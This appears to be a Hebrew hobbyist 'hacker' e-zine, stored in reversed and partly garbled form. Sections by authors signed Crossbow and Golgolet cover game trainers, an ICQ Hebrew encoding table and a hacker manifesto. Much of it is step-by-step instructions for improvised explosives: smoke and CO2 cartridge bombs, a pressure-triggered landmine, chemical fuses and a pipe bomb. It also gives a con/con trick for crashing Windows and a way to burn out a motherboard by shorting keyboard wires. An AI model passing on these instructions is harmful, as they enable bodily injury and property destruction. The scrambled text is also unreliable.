רמרפהו (תינוניבה המרה לש Time3 (ןאכ .השקה המרה לש אישה ןמז תא ןייצמ
יל בותכ היה דיגנ .םינשמ ושפ (םשה תא םינייצמש םירמרפב ומכ Time1÷44 (
זא ...עבראו םיעבראב אלו תחא היינשב יתמייסש םש בותכ היהיש הצור ינא לבא
בותכנו הרושה תא הנשנ ושפ Time1÷1 רשפא םתוא לבא (םירמרפ דוע םנשי ...
רמרפ (לשמל .ומצע קחשמה ךותב תונשל Color ולש ךרעה םא :תוינועבצ ןייצמ
ורכזת דימת .ןבל רוחש קחשמה זא (ספא אוה םא (ינועבצ קחשמה זא (דחא אוה
האלמ השיג םכל שיו (ירסי"גרב וא (והשלכ !בוקב (והשפיא רמשהל ךירצ עדימש
(םכלש ...וצרתש םוקמ לכל
Crossbow
השקבב בשחמה תא סורהל םיצור
בשחמה תעיקת
...הדובעל זא !ןבומכ ...פוסורקיימ הז יכ ...זואודניו םכל שי םא קר דבוע
הז $לחתה$ תילגנאב .$הלעפה$ לע וצחל ($לחתה$ 'ה ירפת לע וצחל Start םגו (
3.3
הז $הלעפה$ Run ןולח הזכ םכל חתפנ וישכע ."ג התיכל רוזחיש עדי אלש ימו ...
:הככ םש ובתכת ...סק בותכל םוקמ םע הפי con/con אל םא .רנא וצחלת זאו
:םש ובתכת הזה !בוקה תא םיאור ןיידע םתאו בשחמה םכל עקתנ con/nul וצחלתו
(רוציקבו (ביגהל הקיספה תכרעמה (בשחמה תא ונקפד :ונישע המ (וישכע .רנא
(םכלש (ונהת זא ...םילבהא פוסורקיימ
Crossbow
םא חולה תפירש
וכתחתו ןיכס וחקת .יפוי .בשחמה תא ובכת (בו !!!שלח בל ילעבל !למומ אל
השימח ומכ והשמ םש שי וישכע ...בשחמל תדלקמה ןיב רבחמש וחה תא תונידעב
והשימש עגרב (וישכע .ינשה םע דחא םלוכ תא ורבחתו (םתוא םג וחתפת .םיוח
חולה לע הזכ רתי סמוע ונרציש ללגב הזו !#רשיי םאה חול לכ (בשחמה תא קילדי
...םאה חולל היינשב תודוקפ דראילימ תחלוש תדלקמה יכ (םא
(םכלש (ונהת
Crossbow
תוצצפ תקינכת
ךכ תוצצפה תא רפשל םיצור לבא (תוצצפ םינובש םישנאל דעוימ הז סק !ןלהא
ארקנש בושח ןורקע לע תצק הפ ריבסא ינא (רציקב זא !תוביהרמ ...רתוי ויהיש
הפ לבא (תינכמ הקיזיפ לע ןומה דבוע הז ןורקע (סלכ"תב (וישכע .ורחה ןורקע
הצצפ םיצצופמ ונחנאש דיגנ .ייקוא .ישלובה ילב הז תא םכל ריבסא ושפ ינא
3.:
איה ךכל הביסה .יכנא עמכ ןפואב !צופתמ !עה ורח (וישכע .!ע ורח הביבסמו
היהש ומכ הז תא ריבסהל םג רשפא (וישכע .הזל תמרוג ורחה תרוצ ' תילקיזיפ
הצצפהו החותפ דיה םא (וישכע .הצצפ דיב םיקיזחמ ונחנאש דיגנ .ןודגמרא רסב
המ (הצצפה לע הרוגסו תקדוהמ היהת דיה םא לבא (קפדת תצק דיה זא (!צופתת
...ךלש תועבצאב אלוממ היהי בוחר יצחש אוה הרקייש
...הרקיי המ וארתו (ורחה ךותב םכלש הצצפ"ת ומישת זא
(םכלש (ונהת זא
Crossbow
ןופאלפב תירביע ךל ןיאו תירביעב העדוה חולשל הצור
ןויסנמ עדוי םג ינא .ןופאלפל ויקיסייא ךרד תועדוה חלוש םכמ קלחש חוב ינא
םג שי יל זא .תירבעב ךמות אלש ןופאלפ ךרד בותכל תוסנל הז סאבמ המכ ישיא
לכ הנה .תוירבעה תויתואה תא יתיליג (יתישעש רצק רקחמ ירחא !!!ןורתפה תא
3.=
:ןהמ תחא
E ' א 
FE ' ב
GE ' ג
BE ' ד
CE ' ה
;E ' ו
*E ' ז
HE ' ח
קE '
%E ' י
IE ' כ
E ' ך š
E ' ל œ
תיארנ הרואכל הליגרה ןונ תואה וליפא .םיוות ינשמ תבכרומ תוא לכש בל ומיש
בותכל אל דואמ בושח הז (וישכע .םיינש םש שי סלכ"תב לבא (דחא ותמ תבכרומ
(םיליגר םיוותה ראש לכ (הלאה תויתואהמ !וח .קיתעהל אלא (םכמצעב םיוותה תא
:תירבעב פשמ הנה (אמגודל .הלאכו םיחוור (קוסיפ ינמיס ינעי
+FEJE ECE CE E .;E;EFE!E;E)E"E %E E E ž ž 
+בצמה המ .וובסורק ינא
ךיא (זא .ךיא םג וניבת אלא (קיר ולבקת םתסש הצור אל ינא (וישכע +ןיבמ שי
)ילש אבא לש( תירבע ךמות ןופאלפמ ילש ישיאה ןופאלפל יתחלש +הז תא יתיליג
:תאזכ העדוה יתלביקש אוה אציש המ ינעי (תוירבעה תויתואה לכ תא
תשרק!צ#פעסןנםמלךכיחזוהדגבא
ילש ויקיסייא רפסמל (נרניאל תאזה העדוהה תא יתחלש (יתלביקש עגרב (וישכע
:הככ הארנ היה הז .הלאה תורזומה תויתואה תא יתלביק זאו (קויד רתיל
KEDE)E"ELEJEMENEOE!E E E E E E EIE%EקEHE*E;ECEBEGEFE E Ÿ  ž œ š 
שיש האור ינא (המ וישכע 27 הפ שי לבא (תוירבע תויתוא 54 רשפא הפמ .םיוות
םצעבש הנקסמל יתעגה ןכלו (םינמיס ינש אוה תירבע תוא לכ לש דודיקהש ןיבהל
(וישכעמ .יתקדצש רבתסמו (הקידב יתישע .יתקליח זאו (םינמיס ינש איה תוא לכ
(הזכ דודיקל תירבע תכפוהש הנכות הנבא ינא דיתעב ילוא .שדוקה תפשב ורבד
(םכלש .חלשת זאו
Crossbow
וובסורק לש ירבעה וספינמה
הזש עדתש קר$ .$ילילפ הז$ .$ךתוא ורצעי$ .$יקוח אל הז$ .$הז םע קסעתת לא$
(ונלש םירוהה בור לש םילימה הלא .$נרניאה תא וישכע קתנמ ינא$ .$ןכוסמ
.ונחנא ימ םילגמ םהשכ .םילגמ םהשכ
תא עדוי ינא +רקאה הארנ ךיא םעפ םתבשח +רקאה לש םייניע ךותל םעפ םתלכתסה
3.J
E ' מ ž
E ' ם 
E ' נ
E ' ן Ÿ
!E ' ס
OE ' ע
NE ' פ
ME ' #
JE ' צ
LE ' !
"E ' ק
)E ' ר
DE ' ש
KE ' ת
אל םכמ דחא #א .רבדמ רקאה (הארנ אל רקאה :הארנ רקאה ךיא עדוי ינא .הבושתה
.עמשנ רקאה (הארנ אל רקאה יכ .$רקאה הז$ דיגהלו (בוחרב םדאנב תוארל לוכי
הארנש (תקסופ אלש (ולש תונרקסה יפ לע .ולש םילימה יפ לע תוהזל רשפא רקאה
םיעדוי םתא .רפס תיבל !וחמ םג (םירפס ארוקש דחא הז רקאה .רמגת אל םעפ #אש
הז לע ללכב בושחל רשפא ךיא .קדוצ .תעדל בייח רקאה .ןרקס רקאה +המל ילוא
(רפס תיבל תכלל םכלוכ םילוכי םתא .רשפא יא +אל התאו (והשמ עדוי והשימש
.םידמול רפס תיבב .םיעדוי אל רפס תיבב .תעדל אל ןיידעו (תונייצהב םייסלו
םילוכי אל םתא יכ םיעשופ ונחנא +המל םיעדוי םתא .םיעשופ ונל םיארוק םתא
תאז .הארנ אוהש ךיא יפל אל ימו רקאה ימ תעדל םילוכי אל םתא (ונתוא תוהזל
שבולש הז הז ןונח :תיוות וקיבדה םלועב רבד לכל ךיא וארת .םכתמשא םצעב
רקור (תויקנעה םייסנכמה םע הז הז קירפ (םיניערגה םע הז הז סרעא (םייפקשמ
םעפ וסנ .הבושת ןיא +רקאה הז המו .תילמשחה הריגהו רזומה רעישה םע הז הז
.ונחנא ימ עדוי אל התא יכ (רשפא יא .רקאה רייצל
ונלוכ (דחא םוי .ונתוא םיגציימש זמיינקינ .םייודב תומש קר ונלוכ ונחנא
זאו .םדא ינבל וכפהי (םיפוצרפל וכפהי זמיינקינה (דחא םוי .תוהדזהל לכונ
ןב ןקז םדאנבש תויהל לוכי הז ךיא .םתא ימ הארנ ונחנא 40 הז המ עדוי אלש
קר ונחנא יכ ונב ולזלזת לא +רפס תיבב םיבשחמ שאר הזיא יל היהנ קסיד דראה
בושחא אל םעפ #א ינא .םלועב שיש דלי #אב לזלזל לע וליפא ובשחת לא .םידלי
תפש דוע שי דימת .דומלל שדח והשמ שי דימת יכ +המל םיעדוי םתא .רקאה ינאש
.תונרקסמ תעדל הצור .דימת תעדל הצורש דחא הז רקאה .גאב דוע וא (תונכית
המ םיריכבה םישנאל וארת :םלועב םירקאהה לכל ילש רסמה הזו (וובסורק ינא
ורצעת אל םעפ #א םתא :םיעשופ ונחנאש םיבשוחש הלא לכלו .תושעל םילוכי םתא
+ןוכנ (םידלי קר ונחנא (סלכ"תב יכ (ונתוא
הלעפה תכרעמב הדובע לע תצק
לכ ךיא ריבסנ ואוב זא (זואודניו לע דבוע ארוקש ימ וישכעש ןימאמ ינא (בו
!בוק תחקל וישכע םכמ שקבמ ינא רבסהה ךרוצל (בו .תדבוע םצעב הלעפה תכרעמה
וישכע .רבכעה לש ינמיה קלחה לע !וחללו (םמומ ךמסמ הזיא דיגנ (םייוסמ
!בוקהש אוה (תמאב הרקש המ לבא .הרק אל רבד םוש (סלכ"תב .$קתעה$ לע וצחלת
וישכע (בו .סק וא לילצ (הנומת שי :הרימשל תורוצ המכ שי (וישכע .רמשנ
וחתפת (רציקבו (חולה תגוצת תא וחתפתו (ןקתומ זואודניו הבש הייקיתל וסנכית
3.N
C:\Windows\Clipbrd.exe
סקהש איה הבושתה +לזאזעל סק המל (וישכע .סק תוארל םירומא םתא וישכע
.קיתעהל םיצור ונחנא ותואש !בוקה לש קייודמה םוקימה םצעב אוה םיאור םתאש
םיכלוה ונחנא :הפי רתוי והשמ השענ וישכע .הקתעהה לש ןויערה םצעב הז (בו
םילכב הזה קלחה לע וצחלת (וישכע .והשמ וברשו רייצל וסנכית .הנומת קיתעהל
!וחל אוהשכ רבכעה תא וררגת זאו (םיווקמ יושעש עוביר ומכ הארנש רייצה לש
קלחה לע רבכעה לש ינמיה קלחה לע וצחלת וישכע .םכלש רויצהמ קלח ךרואל
וישכע .$קתעה$ לע וצחלת זאו (ירפת םכל הלעיי זאו (ןבלמב ןמוסמ וישכעש
תגוצתל םעפ דוע וסנכית .םולכ ושעת לא (ורמשת לא .רייצהמ ואצתש הצור ינא
ןוכנ םתנבה םא .םתקתעהש קלחה תויהל ךירצ (ןוכנ לכה םתישע םא (וישכע .חולה
םצעב ונחנא $קבדה$ לע םיצחול ונחנאשכ :תלעופ הקתעהה ךיא םיעדוי םתא זא
הז ירחאו והשמ םיקיתעמ ונחנאשכ הז ללגבו (חולה תגוצתב אצמנש המב םישמתשמ
.חולה תגוצת לא סנכוהש ןורחאה רבדה תא קר קיתעי דימת אוה רחא והשמ
שולש יפ םא !בוק דיגנ (םייוסמ !בוק םיחתופ םתאשכ .םיצבק תחיתפ וישכע (בו
.תרחא דבוע םצעב הז (םייוסמ ןגנ ךרד חתפנ !בוקהו (םיידגאה ןיווק תקהל לש
סוד סא םא תכרעמ ךותל זואודניו תכרעמ לש תודוקפה תא םגרתל ךלוה ינא וישכע
לע םיצחול םתא זואודניוב (וישכע +בו (דמלייש סוד סא םא עדוי אלש ימ זא
:תרחא הז סוד סא םאב .חותפל םיצור םתאש !בוקה לע םיימעפ רבכעה
CALL C:\Windows\Winamp\Winamp.exe C:\Music\Queen.mp3
םיצור ונחנאש תכרעמל הרהצהה אוה ןושארה קלחה .שולשל תקלוחמ הדוקפה (וישכע
איה הלימה .תולודג תויתואבש הנושארה הלימה תאז .!בוק ליחתהל
CALL
(בו .אלמ םוקימ (ליעפהל םיצור ונחנא התואש תינכותה אוה ינשה קלחה (בו
תא בותכנ אל ונחנא םא (וישכע .חותפל םיצור ונחנאש !בוקה אוה ןורחאה קלחה
.חותפ !בוק םוש ילב הנכותה תא חתפת תכרעמה ישילשה קלחה
והשמ בותכל םילוכי םתאש םימעפל בל םתמש .הלעפהב םירוציק :ןורחא רבד (בו
ךותב תמקוממ הארנכ תינכותהש ללגב הז +$לחתה$ ירפתבש $הלעפה$ תינכותב
רשפאש תוממומ וליפא (תוינכות ןומה שי הז ללגב .זואודניו לש היירפיסה
:קלח הנה .אלמ םוקימ םושרל ילב חותפל
ASD
REGEDIT
PBRUSH
DIALER
DEFRAG
CDPLAYER
EXPLORER
FREECELL
םיסנכנ !ךרד רוציק םינוב +אלמ םוקימ ילב חתפיי והשמש םישוע ךיא זא (בו
לש םשה .והזו (םיצור םתאש םוקימל ךרד רוציק םינובו (זואודניו לש הייקיתל
!אלמ םוקימ ילב הלעפהל רוציקה לש םשה היהי ךרד רוציקה
(םכלש ...הברה הלעפה תכרעמה תא ורקחת זא (בו
Crossbow
גנופ'גניפ רודכמ ןשע תצצפ
גנופ'גניפ רודכמ הליגר הצצפ רוציל יתיסינשכ וז הצצפ יתיליג :הרעה
.יתיסינש שמח ךותמ םימעפ שמחב דבע הזו
:םירמוח
גנופ'גניפ רודכ%
3..
KODAKIMG
KODAKPRV
MPLAYER
NOTEPAD
NETWATCH
OUTLOOK
PROGMAN
הפירש קבא%
ךרעב% 60 םירורפג ישאר
תודח םיירפסמ וא ןיכס%
יסלפ קבד%
)םיחלצומ םיליתפ ןיכהל ךיא לע םיסק ינש ןיכא ינא( ליתפ%
:הנכהה ןפוא
.תודח םיירפסמ וא ןיכס תרזעב רוח וב ושעו גנופ'גניפ רודכ וחק
רודכה תא ואלמ 50º .םירורפגה ישאר תא רתונה םוקמבו הפירש קבא
.םינפב יצח !וחב יצח היהישו ליתפ וסינכה
.יסלפ קבד לש רשפאה לככ הקד הבכש ביבסמ וחרמ ןשע היהיש ידכו
Golgolet
שקומ ןיכהל ךיא
.שקומה תא ליעפהל ידכ וכרדי וילעש (ןצחל םיכירצ םתא לכ םדוק
יראלוס קילדמל ינשה תאו לוו עשת לש הירבל דחא רבח (ןצחלהמ םיוחה ינש תא חק
םאתצמ אל םא .)הז לע #סונ סק השעא ינא()םילי לש םילדומב אוצמל רשפא ללכ ךרדב(
(יראלוס קילדמ
לע !ילממ דואמ דואמ דואמ ינא לבא (קירה תא השעי ואירס וח לש דואמ הקד הכיתח
.יראלוס קילדמ
3.;
םג( זויפ םירבחמ יראלוסה קילדמהמו יראלוסה קילדמל םירבחמ הירבה לש ינשה וחה תא
ינא הז לע
(רוניצ תצצפ 'תוצלמומ תוצצפ( הצצפל )סק השעי pipe bomb תצצפ () CO2 .)המודכו
:שקומה לש םושיר
ןצחל''''''''''''' הללוס
, /
, /
, /
, /
, /
ראלוס קילדמ
הצצפ
קמועה( סנכי לכהש קומע קיפסמ לבא ידמ קומע אל (רוב ורפח שקומ םכל שיש רחאל וישכע
הזיאב יולת
.ידמ יולג אל ךא יולג ןצחלה תא וריאשה רובה יוסיכ רחאל )הצצפ וזיאבו םישמתשמ םתא ןצחל
הצצפה תא ולתש 4-1 ךלוה (לחוז !ר(ךלוה םדאנבה תוריהמ וזיאב יולת(ןצחלהמ םירמ
.)המודכו
םדאנבה םכיבושיחב םתקדצ םא
!!!םםםםםםםםםםםםםםםםםםםוווווווווווווווווובבבבבבבבבב...ןכסמה
...יח(יח(יח
(תויצוציפב םכלש

Golgolet
ליתפ ןיכהל ךיא
:רהמ #רשנש ליתפ
ךר הנתוכ וח.''
( הרוחש הקבא .'' fine black powder )
1 יבשב הקבאה תא וסימת . k הקבדה רוציל
3;*
2 ובבוס . 3 הנתוכ יוח
3 הקבאהה םע םיוחה תשולש תא וקיבדת.
4 הצצפל ורבחת .
:אל #רשנש ליפ
ךר הנתוכ וח.''
( ארינ םויסאופ.'' potassium nitrate ( ארול"צ םויסאופ וא ) potassium chlorate )
( סוממ רכוס.'' granulated sugar )
.'' 3 םיכורש
1 םייקנ םימ םע וקנת זאו םינובס םעו םימח םימב הנתוכה תא וצחר .
2 :הרעקב םיאבה תא ובברעת .
% 1 ארול"צ םויסאופ וא ארינ םויסאופ לש הכיתח
% 1 סמומ רכוס לש הכיתח
% 2 םימחה םימה לש תוכיתח
3 תבורעתב םיכורשה תשולש תא ולבת.
4 םהניב ורבח.
5 הצצפל ורבח.
.םירחא םיליתפ לע בותכי ינא (יל םמעשי םא (ילוא (רתויב םיינוציקה םיזויפה ויה ולא
(םכלש
Golgolet
תצצפ CO2
הליגר הצצפ רותב ליעי םג ךא םישקומ ליבשב ליעי :הרעה
.םירמינס שמחב רוחה תא ולידגת (והשמ וא ןרופיצ םעו הקיר תינסחמ וחק
תינסחמה לש תיתחתה תקיפד י$ע בו בו הז תא ונסחאתו הרוחש הקבאב תינסחמה תא ואלמ
.השק חשמ לע
.ליתפ וסינכה )!האכה אל הלק הקיפד(
3;+
!8!8!םיצור אל םתאש המ !צופל לוכי !הקזח הצצפ וזו !השק הז לבא רצק רבסה הזש עדוי ינא
(םכלש
Golgolet
םישקומל ושפ ןצחל
:םירמוח
(% 2 ( תוקד תכתמ תוכיתח ) 2 'ו בחורל רמינס 5 )דחא לכ הבוגל רמינס
(% 2 למשח יוח )
(% 1 תורוניצ פייולס )
:הדובעה ךרד
:םפוסב רוח וחדקתו תכתמה תוכיתח יתש תא וחק
00000
1 o 1
3;9
1 1
1 1
1 1
1 1
'''''
:הלש שילש ינש לע תורוניצ פייולס וקיבדתו תחא הכיתח לע
00000
1 o 1
1 1
1 %%%%%%1
1 %%%%%%1
1 %%%%%%1
'''''
:הלש יצח לע תורוניצ פייולס וקיבדת היינשה הכיתחה לע
00000
1 o 1
1 1
1 1
1 %%%%%%1
1 %%%%%%1
'''''
)הנושארה לע היינשה הכיתחה תא( ינשה לע דחא םתוא ומיש ומיש (וישכע
הנוילעה תא ופפוכתו 45 הלעמל תולעמ
/
/
תורוניצ פייולס ' --- ---/
תכתמ ' ''' -----'''
םירוחב למשח יוחה יתש תא ויסנכתו תורוניצ פייולס םע תוכיתחה יתש תא ורבחת
/$$$$
למשח יוח ' $$$ /
תורוניצ פייולס ' --- -----/
תכתמ ' ''' -----'''$$$$
!ןכומ הז !והז
(םכלש
Golgolet
ליפר תצצפ
איה איה העשה םא .בוש םכל םולש ןכןכ 11:00 (רקובב
!!! )דומח ינא יייו( תוצצפל םינק דוע םתא (ןושיל וכלתש #ידע
תשוחנ ליפר םע ע (הביתכ ילכ תונח הזיאב ושקבתש